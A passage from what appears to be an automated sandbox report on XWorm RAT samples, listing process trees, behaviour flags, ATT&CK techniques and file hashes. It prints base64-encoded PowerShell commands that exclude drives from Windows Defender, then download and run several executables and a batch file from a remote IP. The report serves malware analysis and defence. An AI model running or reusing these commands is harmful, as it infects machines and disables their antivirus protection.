BpAHYAZQApACAAPAAjAGUAZABrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB5ACMAPgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AWQBlAGwAbABvAHcALgBlAHgAZQAnACwAIAA8ACMAdgBqAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB6AGMAcAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB1AGIAZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQApADwAIwB3AGwAZgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AYQB2AGQAaQBzAGEAYgBsAGUALgBiAGEAdAAnACwAIAA8ACMAZAB3AGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGQAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB5AGwAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBBAHYAZABpAHMALgBiAGEAdAAnACkAKQA8ACMAcABmAG0AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMgAwADkALgAxADYAMAAuADcAMAAvAEwAaQBjAGUAbgBzAGUAQwBoAGUAYwBrAGUAcgAuAGUAeABlACcALAAgADwAIwBiAHMAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAdgBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAYQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApACkAPAAjAHEAdQBzACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADIAMAA5AC4AMQA2ADAALgA3ADAALwBQAEwAVgAuAGUAeABlACcALAAgADwAIwBrAGcAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAagB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAYgBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFAATABUAGUAcwB0AC4AZQB4AGUAJwApACkAPAAjAGEAaQBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGYAeQBqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB4AHEAbQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQA8ACMAcwB2AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgBkAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAZwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEEAdgBkAGkAcwAuAGIAYQB0ACcAKQA8ACMAagBpAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaQByAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAdwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApADwAIwB4AHcAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGMAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdwBnAGgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABMAFQAZQBzAHQALgBlAHgAZQAnACkAPAAjAHoAZgBsACMAPgA="
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3324
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#vmm#>[System.Windows.Forms.MessageBox]::Show('Injection error! File must be started as Administrator!','','OK','Error')<#cuk#>;
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3008
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Avdis.bat" "
      4⤵
      PID:4004
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 240
  2⤵
  - Program crash
  PID:4004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2308 -ip 2308
1⤵
PID:1612

C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main\XWorm-Remote-Access-Tool-main\xworm.exe
"C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main\XWorm-Remote-Access-Tool-main\xworm.exe"
1⤵
- Suspicious use of SetThreadContext
PID:2864
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:3532
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAeQBsACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBtACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAGoAZQBjAHQAaQBvAG4AIABlAHIAcgBvAHIAIQAgAEYAaQBsAGUAIABtAHUAcwB0ACAAYgBlACAAcwB0AGEAcgB0AGUAZAAgAGEAcwAgAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIQAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAYwB1AGsAIwA+ADsAIgA7ADwAIwBsAG0AbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAcQBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAZABrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB5ACMAPgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AWQBlAGwAbABvAHcALgBlAHgAZQAnACwAIAA8ACMAdgBqAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB6AGMAcAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB1AGIAZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQApADwAIwB3AGwAZgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AYQB2AGQAaQBzAGEAYgBsAGUALgBiAGEAdAAnACwAIAA8ACMAZAB3AGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGQAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB5AGwAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBBAHYAZABpAHMALgBiAGEAdAAnACkAKQA8ACMAcABmAG0AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMgAwADkALgAxADYAMAAuADcAMAAvAEwAaQBjAGUAbgBzAGUAQwBoAGUAYwBrAGUAcgAuAGUAeABlACcALAAgADwAIwBiAHMAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAdgBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAYQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApACkAPAAjAHEAdQBzACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADIAMAA5AC4AMQA2ADAALgA3ADAALwBQAEwAVgAuAGUAeABlACcALAAgADwAIwBrAGcAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAagB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAYgBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFAATABUAGUAcwB0AC4AZQB4AGUAJwApACkAPAAjAGEAaQBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGYAeQBqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB4AHEAbQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQA8ACMAcwB2AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgBkAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAZwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEEAdgBkAGkAcwAuAGIAYQB0ACcAKQA8ACMAagBpAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaQByAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAdwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApADwAIwB4AHcAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGMAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdwBnAGgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABMAFQAZQBzAHQALgBlAHgAZQAnACkAPAAjAHoAZgBsACMAPgA="
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1052
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#vmm#>[System.Windows.Forms.MessageBox]::Show('Injection error! File must be started as Administrator!','','OK','Error')<#cuk#>;
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1080
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Avdis.bat" "
      4⤵
      PID:3008
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 240
  2⤵
  - Program crash
  PID:4208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2864 -ip 2864
1⤵
PID:3580

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1520
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main\XWorm-Remote-Access-Tool-main\VMProtectSDK64.lib"
  2⤵
  - Checks processor information in registry
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:4864
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
    3⤵
    PID:4924
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=748718BA101300B8FD86C945049657EA --mojo-platform-channel-handle=1776 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      PID:5020
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=F76545D90BC430C01F5F4DAF1164F104 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=F76545D90BC430C01F5F4DAF1164F104 --renderer-client-id=2 --mojo-platform-channel-handle=1768 --allow-no-sandbox-job /prefetch:1
      4⤵
      PID:4536
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=B06D9F4A8ECF243D109971D8287C754F --mojo-platform-channel-handle=2352 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      PID:628
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=2B9067D0A234F2A45EFB3D55AECCCF69 --mojo-platform-channel-handle=2468 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      PID:484
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=69E283D4BEA8BEB8425962CC156712D0 --mojo-platform-channel-handle=2400 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      PID:2016

C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe
"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe"
1⤵
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3488

C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe
"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"
1⤵
- NTFS ADS
PID:1520
- C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Command Reciever.exe
  "C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Command Reciever.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:3364
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\tox44xxt\tox44xxt.cmdline"
    3⤵
    PID:3892
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD812.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc213C188CEBD14CB4AE155A2E9FCEB5F7.TMP"
      4⤵
      PID:2384

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:2144

C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm.exe
"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm.exe"
1⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious use of AdjustPrivilegeToken
PID:1380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
  2⤵
  PID:2884
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x12c,0x130,0x134,0x108,0x138,0x7ff9467c3cb8,0x7ff9467c3cc8,0x7ff9467c3cd8
    3⤵
    PID:1644
- C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm.exe
  "C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm.exe"
  2⤵
  - Executes dropped EXE
  PID:4468

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scripting

T1064

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

Filesize
226B

MD5
1294de804ea5400409324a82fdc7ec59

SHA1
9a39506bc6cadf99c1f2129265b610c69d1518f7

SHA256
494398ec6108c68573c366c96aae23d35e7f9bdbb440a4aab96e86fcad5871d0

SHA512
033905cc5b4d0c0ffab2138da47e3223765146fa751c9f84b199284b653a04874c32a23aae577d2e06ce6c6b34fec62331b5fc928e3baf68dc53263ecdfa10c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
f0054bb5a8ef84880b0fb12e4acffc7f

SHA1
78c243b48f7baaa3475f3cb911d04f7972697627

SHA256
b9ff5ace7c85aea72f82bb2a9b21619ab3c3cc5a28df58031276ffb4b0c66494

SHA512
88e635765ff7cddccfc2f58d3610cb82d7b257d55a6c50b0cd474ef06cbd793d74d72e4a483b955392baf4ffe133ae3d7c095f7920154a1ecbc1830e34f5d7ca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d459a8c16562fb3f4b1d7cadaca620aa

SHA1
7810bf83e8c362e0c69298e8c16964ed48a90d3a

SHA256
fa31bc49a2f9af06d325871104e36dd69bfe3847cd521059b62461a92912331a

SHA512
35cb00c21908e1332c3439af1ec9867c81befcc4792248ee392080b455b1f5ce2b0c0c2415e344d91537469b5eb72f330b79feb7e8a86eeb6cf41ec5be5dfd2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
656bb397c72d15efa159441f116440a6

SHA1
5b57747d6fdd99160af6d3e580114dbbd351921f

SHA256
770ed0fcd22783f60407cdc55b5998b08e37b3e06efb3d1168ffed8768751fab

SHA512
